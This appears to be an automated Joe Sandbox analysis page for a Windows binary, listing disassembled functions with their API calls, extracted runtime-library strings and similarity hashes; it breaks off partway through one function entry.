Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpy
String ID:
API String ID: 772431862-0
Opcode ID: 309c151dfdb08d85403840f07dcb93ad76ef44dc397d826adaf2311f482d26cf
Instruction ID: be845ebf1fda96da81c22314abee21390b60da69c44a17726900b41baf37c163
Opcode Fuzzy Hash: 309c151dfdb08d85403840f07dcb93ad76ef44dc397d826adaf2311f482d26cf
Instruction Fuzzy Hash: 9F918822E2D647B2EF51BF11E440779E3A1AF08B80FC44135CA0D43391EE7EE848A724

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D943C0 Relevance: 4.6, APIs: 3, Instructions: 65
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF738D939D0: wcslen.MSVCRT ref: 00007FF738D93A58
Part of subcall function 00007FF738D939D0: wcslen.MSVCRT ref: 00007FF738D93AE6

GetFileSize.KERNEL32 ref: 00007FF738D943FB
GetProcessHeap.KERNEL32 ref: 00007FF738D94406
HeapAlloc.KERNEL32 ref: 00007FF738D94414

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: Heapwcslen$AllocFileProcessSize
String ID:
API String ID: 3094376029-0
Opcode ID: 20d5c65533ca206241f889d3d9836304a7793a99cc08750aed63af84508c6325
Instruction ID: d3a8695a2b7b5991a56d4926bb45c10d5454ee6bcd1d214f8b52ec070fd2e077
Opcode Fuzzy Hash: 20d5c65533ca206241f889d3d9836304a7793a99cc08750aed63af84508c6325
Instruction Fuzzy Hash: CA11B137A18A1555EB51AB25B815747E291BB88BBCF800231DE5D43794EF7CC489D700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DC2490 Relevance: 1.4, APIs: 1, Instructions: 191COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF738DC19A0: malloc.MSVCRT(?,?,?,?,00007FF738DC23B5,?,?,?,?,00007FF738D93C24), ref: 00007FF738DC19B1

Part of subcall function 00007FF738DBA110: strlen.MSVCRT ref: 00007FF738DBA13B

Part of subcall function 00007FF738D9FEC0: RtlCaptureContext.KERNEL32 ref: 00007FF738D9FF45
Part of subcall function 00007FF738D9FEC0: RtlUnwindEx.KERNEL32 ref: 00007FF738D9FF63
Part of subcall function 00007FF738D9FEC0: abort.MSVCRT ref: 00007FF738D9FF69

Part of subcall function 00007FF738DBA290: strlen.MSVCRT ref: 00007FF738DBA2BB

Part of subcall function 00007FF738DBA7A0: strlen.MSVCRT ref: 00007FF738DBA7CB

Part of subcall function 00007FF738DB9850: strlen.MSVCRT ref: 00007FF738DB987B

Part of subcall function 00007FF738DBA970: strlen.MSVCRT ref: 00007FF738DBA99B

Part of subcall function 00007FF738DBAAF0: strlen.MSVCRT ref: 00007FF738DBAB1B

malloc.MSVCRT ref: 00007FF738DC2752

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: strlen$malloc$CaptureContextUnwindabort
String ID:
API String ID: 3412053993-0
Opcode ID: f0681c3af7f834308cd656b74fdb5bd540acaac29b47731a026287562199051c
Instruction ID: 7305c810543cca6be73012aca8041ba90a385ef3c9b8b57c58d5da009ea81678
Opcode Fuzzy Hash: f0681c3af7f834308cd656b74fdb5bd540acaac29b47731a026287562199051c
Instruction Fuzzy Hash: 7E618722A1965670E914BB56BC553B6E371BF49BC8FC01431ED8D0B352DE3DD048A3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DC2530 Relevance: 1.4, APIs: 1, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF738DC19A0: malloc.MSVCRT(?,?,?,?,00007FF738DC23B5,?,?,?,?,00007FF738D93C24), ref: 00007FF738DC19B1

Part of subcall function 00007FF738DBA7A0: strlen.MSVCRT ref: 00007FF738DBA7CB

Part of subcall function 00007FF738D9FEC0: RtlCaptureContext.KERNEL32 ref: 00007FF738D9FF45
Part of subcall function 00007FF738D9FEC0: RtlUnwindEx.KERNEL32 ref: 00007FF738D9FF63
Part of subcall function 00007FF738D9FEC0: abort.MSVCRT ref: 00007FF738D9FF69

Part of subcall function 00007FF738DB9850: strlen.MSVCRT ref: 00007FF738DB987B

Part of subcall function 00007FF738DBA970: strlen.MSVCRT ref: 00007FF738DBA99B

Part of subcall function 00007FF738DBAAF0: strlen.MSVCRT ref: 00007FF738DBAB1B

malloc.MSVCRT ref: 00007FF738DC2752

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: strlen$malloc$CaptureContextUnwindabort
String ID:
API String ID: 3412053993-0
Opcode ID: 93d5ee2c6aaf0008122d9e70a301f82916df8bd8c2d61856d1b3d42c2f024549
Instruction ID: 781dfc5f7a82ced46b544c8949fe3017f49a6839e2351c9c9231be7432584baf
Opcode Fuzzy Hash: 93d5ee2c6aaf0008122d9e70a301f82916df8bd8c2d61856d1b3d42c2f024549
Instruction Fuzzy Hash: 9B516422A19616B0FA14BB16FC553B6E371BB49788FD01435ED8D07392DE7ED048A3A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA7060 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 157
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF738DA7068
CreateMutexA.KERNEL32 ref: 00007FF738DA7177
WaitForSingleObject.KERNEL32 ref: 00007FF738DA7188
FindAtomA.KERNEL32 ref: 00007FF738DA719D
AddAtomA.KERNEL32 ref: 00007FF738DA71DD
_onexit.MSVCRT ref: 00007FF738DA71FA
ReleaseMutex.KERNEL32 ref: 00007FF738DA7202
CloseHandle.KERNEL32 ref: 00007FF738DA720B

Strings

failed to get string from atom, xrefs: 00007FF738DA72F6
failed to add string to atom table, xrefs: 00007FF738DA72C3
aaaaaaaa, xrefs: 00007FF738DA7114
aaaaaaaa, xrefs: 00007FF738DA711E
PiAlAaAa__shmem3_winpthreads_tdm_, xrefs: 00007FF738DA706E, 00007FF738DA712F
__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAAaaAAAaaAaaaaaAaAaaaAaAaaaaaaaaa, xrefs: 00007FF738DA70DB, 00007FF738DA7196, 00007FF738DA71D6, 00007FF738DA7227
__shmem3_winpthreads_tdm_, xrefs: 00007FF738DA70B7, 00007FF738DA70E7
failed to to lock creation mutex, xrefs: 00007FF738DA72D6

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: AtomMutex$CloseCreateCurrentFindHandleObjectProcessReleaseSingleWait_onexit
String ID: PiAlAaAa__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAAaaAAAaaAaaaaaAaAaaaAaAaaaaaaaaa$aaaaaaaa$aaaaaaaa$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
API String ID: 2382646235-1103176096
Opcode ID: a7566c4363776fb2f142f84513ee5a94bc791e29e32db4c34a702c3beaa6482f
Instruction ID: 1226f7ecd5bdb05cda3a65a1fe2c4725ed29b4d01c65bbcbef687807f95e72aa
Opcode Fuzzy Hash: a7566c4363776fb2f142f84513ee5a94bc791e29e32db4c34a702c3beaa6482f
Instruction Fuzzy Hash: C2618FF6A1D643B1EA45AF14E8012B6E3B2BF08785FC44031C94E4B394EE7DE509A724

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA3520 Relevance: 24.4, APIs: 16, Instructions: 450COMMON

Download Yara Rule

APIs

RemoveVectoredExceptionHandler.KERNEL32 ref: 00007FF738DA3594
TlsGetValue.KERNEL32 ref: 00007FF738DA35ED
CloseHandle.KERNEL32 ref: 00007FF738DA362B
CloseHandle.KERNEL32 ref: 00007FF738DA3638
TlsSetValue.KERNEL32 ref: 00007FF738DA36A5

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CloseHandleValue$ExceptionHandlerRemoveVectored
String ID:
API String ID: 2941551293-0
Opcode ID: 67c97d2b0fe632f4fb20c12def0e5228ddbe2ecb36f3870be98da43108ad0dd3
Instruction ID: 90ef236039cadff2618c952d3b8635b689361f552fc16f756b7fbacca7173b19
Opcode Fuzzy Hash: 67c97d2b0fe632f4fb20c12def0e5228ddbe2ecb36f3870be98da43108ad0dd3
Instruction Fuzzy Hash: EC225123A29706A1EA58BB15D454379E3A2FF88B94FA40535DD0D0B7D1DF3EE448E328

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA6F70 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32 ref: 00007FF738DA6F81
WaitForSingleObject.KERNEL32 ref: 00007FF738DA6F92
FindAtomA.KERNEL32 ref: 00007FF738DA6FFF
ReleaseMutex.KERNEL32 ref: 00007FF738DA700D
CloseHandle.KERNEL32 ref: 00007FF738DA7016
CloseHandle.KERNEL32 ref: 00007FF738DA7037

Strings

failed to to lock cleanup mutex, xrefs: 00007FF738DA7028
PiAlAaAa__shmem3_winpthreads_tdm_, xrefs: 00007FF738DA6F7A
__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAAaaAAAaaAaaaaaAaAaaaAaAaaaaaaaaa, xrefs: 00007FF738DA6FF8

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: CloseHandleMutex$AtomCreateFindObjectReleaseSingleWait
String ID: PiAlAaAa__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAAaaAAAaaAaaaaaAaAaaaAaAaaaaaaaaa$failed to to lock cleanup mutex
API String ID: 3776795807-4153265460
Opcode ID: f862491ff4c3ba5945405b97c927dcecf34c299a1984f3d4105c76ec3890af5a
Instruction ID: 97b63b2437fb8d0a0fc4a26e3f2d7b2f0e567e88214c32cdfece29ec06d45668
Opcode Fuzzy Hash: f862491ff4c3ba5945405b97c927dcecf34c299a1984f3d4105c76ec3890af5a
Instruction Fuzzy Hash: 472142A2A19A03F1EE54BF55E854135E3B2BF48B85BD49435C80D4B390EE3DE849E724

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA2D40 Relevance: 16.7, APIs: 11, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 00007FF738DA2DA0

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7a2b5f52572ddb7f3fab963f5045169fe13579b7e3dcc0f1855f9a6abb98b3e6
Instruction ID: fe830b0338ff56e526182c254b626a7e600be102f41b1bad130d85d9d0c3f3ea
Opcode Fuzzy Hash: 7a2b5f52572ddb7f3fab963f5045169fe13579b7e3dcc0f1855f9a6abb98b3e6
Instruction Fuzzy Hash: 0D715C72A19B02A5EB60AF26D440369F6B0FF48B94F940135CA5C0B3D5DF3DE458E768

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D94090 Relevance: 13.6, APIs: 4, Strings: 5, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF738D940C1
wcslen.MSVCRT ref: 00007FF738D94117

Part of subcall function 00007FF738DBDEF0: memcpy.MSVCRT ref: 00007FF738DBDF96
Part of subcall function 00007FF738DBDEF0: memcpy.MSVCRT ref: 00007FF738DBDFC1

wcslen.MSVCRT ref: 00007FF738D941B7
memcpy.MSVCRT ref: 00007FF738D942E6

Strings

basic_string::_M_construct null not valid, xrefs: 00007FF738D94300
\??\, xrefs: 00007FF738D94110, 00007FF738D94129
@, xrefs: 00007FF738D9426B
0, xrefs: 00007FF738D94260
, xrefs: 00007FF738D941CE

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpywcslen
String ID: $0$@$\??\$basic_string::_M_construct null not valid
API String ID: 982415701-2971582370
Opcode ID: b5d247323698149d340c130ac0e6dd9a73dea5bbab17d57a17569d1199411ecf
Instruction ID: b57670b00e21e2ba30cda5f3d55047d4636376b83eae7a84f6c1da1808bbd9c5
Opcode Fuzzy Hash: b5d247323698149d340c130ac0e6dd9a73dea5bbab17d57a17569d1199411ecf
Instruction Fuzzy Hash: 09613333628BC1A5EA30AB15F4503AAF3A1FB88784F844235DA8D47B99DF7DD108DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738DA0230 Relevance: 12.1, APIs: 8, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1187da6e171b2e77c5614d760d31e22034ad26bdc6425de355795f4ea1b5fa90
Instruction ID: da1cd45f1f89a074d86b4e6663fda7fae3459f08ce371137605573044a9cf20e
Opcode Fuzzy Hash: 1187da6e171b2e77c5614d760d31e22034ad26bdc6425de355795f4ea1b5fa90
Instruction Fuzzy Hash: D8519223A29706F1EB11AF11E4505B8E3A4FF48B84FE88435D90D0B391DE3DE949E324

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D939D0 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF738D93A58

Part of subcall function 00007FF738DBDEF0: memcpy.MSVCRT ref: 00007FF738DBDF96
Part of subcall function 00007FF738DBDEF0: memcpy.MSVCRT ref: 00007FF738DBDFC1

wcslen.MSVCRT ref: 00007FF738D93AE6
memcpy.MSVCRT ref: 00007FF738D93BFE

Strings

@, xrefs: 00007FF738D93B55
basic_string::_M_construct null not valid, xrefs: 00007FF738D93C18
, xrefs: 00007FF738D93AEB
\??\, xrefs: 00007FF738D93A51, 00007FF738D93A6A
0, xrefs: 00007FF738D93B4A

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: memcpy$wcslen
String ID: $0$@$\??\$basic_string::_M_construct null not valid
API String ID: 1844840824-2971582370
Opcode ID: ee05ecdc9710429fa0aab71fa4d1ecee077df793fd946b12f4536450c2e0f0d3
Instruction ID: 358d58540607f7302b009d94bcea2a61b1d1bb3924b39f7cfd497df1d865d051
Opcode Fuzzy Hash: ee05ecdc9710429fa0aab71fa4d1ecee077df793fd946b12f4536450c2e0f0d3
Instruction Fuzzy Hash: 1E518933618B85A1EA64EF16E4103AAF3A0FBC8794F945135EA8D43B99DF7DD008DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D93CD0 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF738D93D01
wcslen.MSVCRT ref: 00007FF738D93D57

Part of subcall function 00007FF738DBDEF0: memcpy.MSVCRT ref: 00007FF738DBDF96
Part of subcall function 00007FF738DBDEF0: memcpy.MSVCRT ref: 00007FF738DBDFC1

wcslen.MSVCRT ref: 00007FF738D93DF7
memcpy.MSVCRT ref: 00007FF738D93F26

Strings

basic_string::_M_construct null not valid, xrefs: 00007FF738D93F40
\??\, xrefs: 00007FF738D93D50, 00007FF738D93D69
0, xrefs: 00007FF738D93EA0
@, xrefs: 00007FF738D93EAB

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

